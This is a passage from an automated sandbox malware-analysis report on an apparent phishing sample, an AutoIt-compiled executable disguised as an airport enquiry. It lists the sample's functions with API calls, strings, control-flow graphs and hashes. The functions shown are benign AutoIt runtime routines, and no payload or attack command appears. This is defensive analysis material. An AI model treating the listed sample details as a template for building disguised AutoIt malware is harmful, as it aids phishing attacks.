            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
            • API String ID: 2914291525-1005189915
            • Opcode ID: a8da1d79ab8debfc545f24c794a4216870306d1b487736b490b92f7f3726a428
            • Instruction ID: 58f9ad75fe5fc1817fad3a79e90a708bfc7bbdb5ae87941d1d68e1db5710a190
            • Opcode Fuzzy Hash: a8da1d79ab8debfc545f24c794a4216870306d1b487736b490b92f7f3726a428
            • Instruction Fuzzy Hash: 683136B5941309AFDB50DFA4EC84BC9BBF0FB0A310F24452AE585E63A0E3B545418FA2
            Function 00C83041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00C83074
            • RegisterClassExW.USER32(00000030), ref: 00C8309E
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C830AF
            • InitCommonControlsEx.COMCTL32(?), ref: 00C830CC
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C830DC
            • LoadIconW.USER32(000000A9), ref: 00C830F2
            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C83101
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
            • API String ID: 2914291525-1005189915
            • Opcode ID: af248964d9b4e1ce61ca10d91ff4a76ed11c8c3b0091d56edd1745866a0fbb39
            • Instruction ID: f5f97a43768bc5a374547c35bd30c06bb0f5cdba8d219e402997da64f2f5bb19
            • Opcode Fuzzy Hash: af248964d9b4e1ce61ca10d91ff4a76ed11c8c3b0091d56edd1745866a0fbb39
            • Instruction Fuzzy Hash: B821C5B5900318AFDB10DFA4E889B9DBBF4FB0A700F10452AF915E63A0D7B145448FA6
            Function 00C871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
              • Part of subcall function 00C84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D462F8,?,00C837C0,?), ref: 00C84882
              • Part of subcall function 00CA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C872C5), ref: 00CA0771
            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C87308
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CBECF1
            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CBED32
            • RegCloseKey.ADVAPI32(?), ref: 00CBED70
            • _wcscat.LIBCMT ref: 00CBEDC9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
            • API String ID: 2673923337-2727554177
            • Opcode ID: 31880189216128de3880e6ec9597181485b5ba84009f1f107576e9d8a819ff65
            • Instruction ID: 9ef0e414f6f959b3c2910bcb7393d58f8e9aa68d5dceba5eb807094c26cc05c1
            • Opcode Fuzzy Hash: 31880189216128de3880e6ec9597181485b5ba84009f1f107576e9d8a819ff65
            • Instruction Fuzzy Hash: 437169754083019FC314EF65EC819ABBBE8BF56744F50092EF455C32A0EBB09948DBAA
            Function 00C83A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetSysColorBrush.USER32(0000000F), ref: 00C83A62
            • LoadCursorW.USER32(00000000,00007F00), ref: 00C83A71
            • LoadIconW.USER32(00000063), ref: 00C83A88
            • LoadIconW.USER32(000000A4), ref: 00C83A9A
            • LoadIconW.USER32(000000A2), ref: 00C83AAC
            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C83AD2
            • RegisterClassExW.USER32(?), ref: 00C83B28
              • Part of subcall function 00C83041: GetSysColorBrush.USER32(0000000F), ref: 00C83074
              • Part of subcall function 00C83041: RegisterClassExW.USER32(00000030), ref: 00C8309E
              • Part of subcall function 00C83041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C830AF
              • Part of subcall function 00C83041: InitCommonControlsEx.COMCTL32(?), ref: 00C830CC
              • Part of subcall function 00C83041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C830DC
              • Part of subcall function 00C83041: LoadIconW.USER32(000000A9), ref: 00C830F2
              • Part of subcall function 00C83041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C83101
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
            • String ID: #$0$AutoIt v3
            • API String ID: 423443420-4155596026
            • Opcode ID: 180d45b57b28c2fd1a96b38fe26e702ac17e3ae91e170880ca9e6f6026ad2393
            • Instruction ID: 4788c2f7c0341e9e98ca214d4fec01309b3c405d1e6b1c211e3652f66b9f25a2
            • Opcode Fuzzy Hash: 180d45b57b28c2fd1a96b38fe26e702ac17e3ae91e170880ca9e6f6026ad2393
            • Instruction Fuzzy Hash: F7213974900304BFEF109FA4EC89B9D7BB4FB0A715F10012AE505E63A0D3B696549FAA
            Function 00C83633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 767 c83633-c83681 769 c836e1-c836e3 767->769 770 c83683-c83686 767->770 769->770 773 c836e5 769->773 771 c83688-c8368f 770->771 772 c836e7 770->772 774 c8375d-c83765 PostQuitMessage 771->774 775 c83695-c8369a 771->775 777 c836ed-c836f0 772->777 778 cbd31c-cbd34a call c911d0 call c911f3 772->778 776 c836ca-c836d2 DefWindowProcW 773->776 783 c83711-c83713 774->783 779 cbd38f-cbd3a3 call ce2a16 775->779 780 c836a0-c836a2 775->780 782 c836d8-c836de 776->782 784 c836f2-c836f3 777->784 785 c83715-c8373c SetTimer RegisterWindowMessageW 777->785 813 cbd34f-cbd356 778->813 779->783 805 cbd3a9 779->805 786 c836a8-c836ad 780->786 787 c83767-c83771 call c84531 780->787 783->782 791 c836f9-c8370c KillTimer call c844cb call c83114 784->791 792 cbd2bf-cbd2c2 784->792 785->783 788 c8373e-c83749 CreatePopupMenu 785->788 793 c836b3-c836b8 786->793 794 cbd374-cbd37b 786->794 807 c83776 787->807 788->783 791->783 798 cbd2f8-cbd317 MoveWindow 792->798 799 cbd2c4-cbd2c6 792->799 803 c8374b-c8375b call c845df 793->803 804 c836be-c836c4 793->804 794->776 802 cbd381-cbd38a call cd817e 794->802 798->783 808 cbd2c8-cbd2cb 799->808 809 cbd2e7-cbd2f3 SetFocus 799->809 802->776 803->783 804->776 804->813 805->776 807->783 808->804 814 cbd2d1-cbd2e2 call c911d0 808->814 809->783 813->776 818 cbd35c-cbd36f call c844cb call c843db 813->818 814->783 818->776
            APIs
            • DefWindowProcW.USER32(?,?,?,?), ref: 00C836D2
            • KillTimer.USER32(?,00000001), ref: 00C836FC
            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C8371F
            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C8372A
            • CreatePopupMenu.USER32 ref: 00C8373E
            • PostQuitMessage.USER32(00000000), ref: 00C8375F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
            • String ID: TaskbarCreated
            • API String ID: 129472671-2362178303
            • Opcode ID: c70500484de1ce8adf5a99408dd8edcf7cecac0feac4aaf35925efbe8a5e82c7
            • Instruction ID: 103564ee875eecdd71443da84ff0f34463ad345f8d8ff86474289d7b5c6078e2
            • Opcode Fuzzy Hash: c70500484de1ce8adf5a99408dd8edcf7cecac0feac4aaf35925efbe8a5e82c7
            • Instruction Fuzzy Hash: C041F3B2200285BBDB247F28DD49B7D3754F742B04F141529F913C23A1EAA0DE04977B
            Function 00C83778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
            Download Yara Rule

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
            • API String ID: 1825951767-3513169116
            • Opcode ID: 4001897f6674ff1ee9f5c94c2790ce53a217e39bbabfbec51dfde8f2b9991dbd
            • Instruction ID: d4b28e0cd587a5e6eb77389987085aa4d5cb77e2fb758da5014d3792d06408b6
            • Opcode Fuzzy Hash: 4001897f6674ff1ee9f5c94c2790ce53a217e39bbabfbec51dfde8f2b9991dbd
            • Instruction Fuzzy Hash: CAA19F72910269ABCB04FFA0CC91AEEB778FF15708F140429F416A7191EF749A09DB69
            Function 00C839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1019 c839e7-c83a57 CreateWindowExW * 2 ShowWindow * 2
            APIs
            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C83A15
            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C83A36
            • ShowWindow.USER32(00000000,?,?), ref: 00C83A4A
            • ShowWindow.USER32(00000000,?,?), ref: 00C83A53
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$CreateShow
            • String ID: AutoIt v3$edit
            • API String ID: 1584632944-3779509399
            • Opcode ID: 96d913728490f0c6a7f3fcdbed8c11224be755f354ccb0ac7808b93e1df37f0e
            • Instruction ID: bc1928245c095f50152c70f84fd4660ed78152b217205cd0181ffeb091dddf81
            • Opcode Fuzzy Hash: 96d913728490f0c6a7f3fcdbed8c11224be755f354ccb0ac7808b93e1df37f0e
            • Instruction Fuzzy Hash: EBF017746403907FEA311B276C88F273E7DE7C7F50B10002AB905E22A0C2E54800CAB6
            Function 00C8410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1020 c8410d-c84123 1021 c84129-c8413e call c87b76 1020->1021 1022 c84200-c84204 1020->1022 1025 cbd5dd-cbd5ec LoadStringW 1021->1025 1026 c84144-c84164 call c87d2c 1021->1026 1029 cbd5f7-cbd60f call c87c8e call c87143 1025->1029 1026->1029 1030 c8416a-c8416e 1026->1030 1039 c8417e-c841fb call ca3020 call c8463e call ca2ffc Shell_NotifyIconW call c85a64 1029->1039 1042 cbd615-cbd633 call c87e0b call c87143 call c87e0b 1029->1042 1032 c84174-c84179 call c87c8e 1030->1032 1033 c84205-c8420e call c881a7 1030->1033 1032->1039 1033->1039 1039->1022 1042->1039
            APIs
            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CBD5EC
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • _memset.LIBCMT ref: 00C8418D
            • _wcscpy.LIBCMT ref: 00C841E1
            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C841F1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
            • String ID: Line:
            • API String ID: 3942752672-1585850449
            • Opcode ID: 289dd165e4f545b4da3fc72ceccaa595e037f991007b4f66a1c40355588b7f1c
            • Instruction ID: be0b58663be51cde800028ec19e1f34382164473a451f3b74656541762bfa1a0
            • Opcode Fuzzy Hash: 289dd165e4f545b4da3fc72ceccaa595e037f991007b4f66a1c40355588b7f1c
            • Instruction Fuzzy Hash: 3831D2710083156BD725FB60DC85BDF73E8AB46308F20461AB19A921A1EBB4D648D7AB
            Function 00CA564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1055 ca564d-ca5666 1056 ca5668-ca566d 1055->1056 1057 ca5683 1055->1057 1056->1057 1059 ca566f-ca5671 1056->1059 1058 ca5685-ca568b 1057->1058 1060 ca568c-ca5691 1059->1060 1061 ca5673-ca5678 call ca8d68 1059->1061 1063 ca569f-ca56a3 1060->1063 1064 ca5693-ca569d 1060->1064 1069 ca567e call ca8ff6 1061->1069 1067 ca56b3-ca56b5 1063->1067 1068 ca56a5-ca56b0 call ca3020 1063->1068 1064->1063 1066 ca56c3-ca56d2 1064->1066 1072 ca56d9 1066->1072 1073 ca56d4-ca56d7 1066->1073 1067->1061 1071 ca56b7-ca56c1 1067->1071 1068->1067 1069->1057 1071->1061 1071->1066 1074 ca56de-ca56e3 1072->1074 1073->1074 1077 ca56e9-ca56f0 1074->1077 1078 ca57cc-ca57cf 1074->1078 1079 ca56f2-ca56fa 1077->1079 1080 ca5731-ca5733 1077->1080 1078->1058 1079->1080 1081 ca56fc 1079->1081 1082 ca579d-ca579e call cb0df7 1080->1082 1083 ca5735-ca5737 1080->1083 1084 ca57fa 1081->1084 1085 ca5702-ca5704 1081->1085 1094 ca57a3-ca57a7 1082->1094 1087 ca575b-ca5766 1083->1087 1088 ca5739-ca5741 1083->1088 1093 ca57fe-ca5807 1084->1093 1091 ca570b-ca5710 1085->1091 1092 ca5706-ca5708 1085->1092 1089 ca576a-ca576d 1087->1089 1090 ca5768 1087->1090 1095 ca5743-ca574f 1088->1095 1096 ca5751-ca5755 1088->1096 1098 ca576f-ca577b call ca4916 call cb10ab 1089->1098 1099 ca57d4-ca57d8 1089->1099 1090->1089 1091->1099 1100 ca5716-ca572f call cb0f18 1091->1100 1092->1091 1093->1058 1094->1093 1101 ca57a9-ca57ae 1094->1101 1097 ca5757-ca5759 1095->1097 1096->1097 1097->1089 1116 ca5780-ca5785 1098->1116 1103 ca57ea-ca57f5 call ca8d68 1099->1103 1104 ca57da-ca57e7 call ca3020 1099->1104 1115 ca5792-ca579b 1100->1115 1101->1099 1102 ca57b0-ca57c1 1101->1102 1107 ca57c4-ca57c6 1102->1107 1103->1069 1104->1103 1107->1077 1107->1078 1115->1107 1117 ca578b-ca578e 1116->1117 1118 ca580c-ca5810 1116->1118 1117->1084 1119 ca5790 1117->1119 1118->1093 1119->1115
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
            • String ID:
            • API String ID: 1559183368-0
            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
            • Instruction ID: e92c2fd1dc838075a6f4e442f69c3734d7e46913cb7e56d113cbe7e97a4a53b5
            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
            • Instruction Fuzzy Hash: 14519171A10B07DBDB248EA988846AE77B5AF42328F64C629F835E62D0D7709E549B40
            Function 00C869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1120 c869ca-c869f1 call c84f3d 1123 cbe45a-cbe46a call ce97e5 1120->1123 1124 c869f7-c86a05 call c84f3d 1120->1124 1128 cbe46f-cbe471 1123->1128 1124->1123 1129 c86a0b-c86a11 1124->1129 1130 cbe473-cbe476 call c84faa 1128->1130 1131 cbe490-cbe4d8 call ca0ff6 1128->1131 1133 cbe47b-cbe48a call ce4534 1129->1133 1134 c86a17-c86a39 call c86bec 1129->1134 1130->1133 1139 cbe4da-cbe4e4 1131->1139 1140 cbe4fd 1131->1140 1133->1131 1143 cbe4f8-cbe4f9 1139->1143 1144 cbe4ff-cbe512 1140->1144 1145 cbe4fb 1143->1145 1146 cbe4e6-cbe4f5 1143->1146 1147 cbe689-cbe69a call ca2f95 call c84faa 1144->1147 1148 cbe518 1144->1148 1145->1144 1146->1143 1157 cbe69c-cbe6ac call c87776 call c85efb 1147->1157 1150 cbe51f-cbe522 call c875e0 1148->1150 1154 cbe527-cbe549 call c85f12 call ce768b 1150->1154 1163 cbe54b-cbe558 1154->1163 1164 cbe55d-cbe567 call ce7675 1154->1164 1171 cbe6b1-cbe6e1 call cdfcb1 call ca106c call ca2f95 call c84faa 1157->1171 1166 cbe650-cbe660 call c8766f 1163->1166 1173 cbe569-cbe57c 1164->1173 1174 cbe581-cbe58b call ce765f 1164->1174 1166->1154 1176 cbe666-cbe670 call c874bd 1166->1176 1171->1157 1173->1166 1183 cbe59f-cbe5a9 call c85f8a 1174->1183 1184 cbe58d-cbe59a 1174->1184 1182 cbe675-cbe683 1176->1182 1182->1147 1182->1150 1183->1166 1190 cbe5af-cbe5c7 call cdfc4d 1183->1190 1184->1166 1195 cbe5ea-cbe5ed 1190->1195 1196 cbe5c9-cbe5e8 call c87f41 call c85a64 1190->1196 1198 cbe61b-cbe61e 1195->1198 1199 cbe5ef-cbe60a call c87f41 call c86999 call c85a64 1195->1199 1219 cbe60b-cbe619 call c85f12 1196->1219 1201 cbe63e-cbe641 call ce7621 1198->1201 1202 cbe620-cbe629 call cdfb6e 1198->1202 1199->1219 1209 cbe646-cbe64f call ca106c 1201->1209 1202->1171 1212 cbe62f-cbe639 call ca106c 1202->1212 1209->1166 1212->1154 1219->1209
            APIs
              • Part of subcall function 00C84F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84F6F
            • _free.LIBCMT ref: 00CBE68C
            • _free.LIBCMT ref: 00CBE6D3
              • Part of subcall function 00C86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C86D0D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$CurrentDirectoryLibraryLoad
            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
            • API String ID: 2861923089-1757145024
            • Opcode ID: 802973fd2f229de42bf2fe0a692efa660017fcf7249ed6176e799878d6cc8171
            • Instruction ID: d6f6b62ad1d0f2b5691ecb94f525cdd9300a09b3c38ae3a2352734b8e30e3098
            • Opcode Fuzzy Hash: 802973fd2f229de42bf2fe0a692efa660017fcf7249ed6176e799878d6cc8171
            • Instruction Fuzzy Hash: 40918D71910219AFCF14EFA5CC819EDB7B4FF19718F14442AF816AB291EB30AE05DB64
            Function 00C835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1224 c835b0-c835bb 1225 c835bd-c835c2 1224->1225 1226 c8362f-c83631 1224->1226 1225->1226 1228 c835c4-c835dc RegOpenKeyExW 1225->1228 1227 c83620-c83625 1226->1227 1228->1226 1229 c835de-c835fd RegQueryValueExW 1228->1229 1230 c835ff-c8360a 1229->1230 1231 c83614-c8361f RegCloseKey 1229->1231 1232 c8360c-c8360e 1230->1232 1233 c83626-c8362d 1230->1233 1231->1227 1234 c83612 1232->1234 1233->1234 1234->1231
            APIs
            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C835A1,SwapMouseButtons,00000004,?), ref: 00C835D4
            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C835A1,SwapMouseButtons,00000004,?,?,?,?,00C82754), ref: 00C835F5
            • RegCloseKey.KERNELBASE(00000000,?,?,00C835A1,SwapMouseButtons,00000004,?,?,?,?,00C82754), ref: 00C83617
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: Control Panel\Mouse
            • API String ID: 3677997916-824357125
            • Opcode ID: 8c62fcabd7485c664e1cd27493e0fd3e1ee10ad4b50c9952f3186e7a542e3444
            • Instruction ID: 890db2db498e0bacee78fff9c4c8ac67bdb5d32d8a429985a161484934e0f5e1
            • Opcode Fuzzy Hash: 8c62fcabd7485c664e1cd27493e0fd3e1ee10ad4b50c9952f3186e7a542e3444
            • Instruction Fuzzy Hash: D1115A71510248BFDB209F68DC40EEEB7B8FF04B44F109469F809D7210E2719F409768
            Function 00CE97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C85045: _fseek.LIBCMT ref: 00C8505D
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AAE
              • Part of subcall function 00CE99BE: _wcscmp.LIBCMT ref: 00CE9AC1
            • _free.LIBCMT ref: 00CE992C
            • _free.LIBCMT ref: 00CE9933
            • _free.LIBCMT ref: 00CE999E
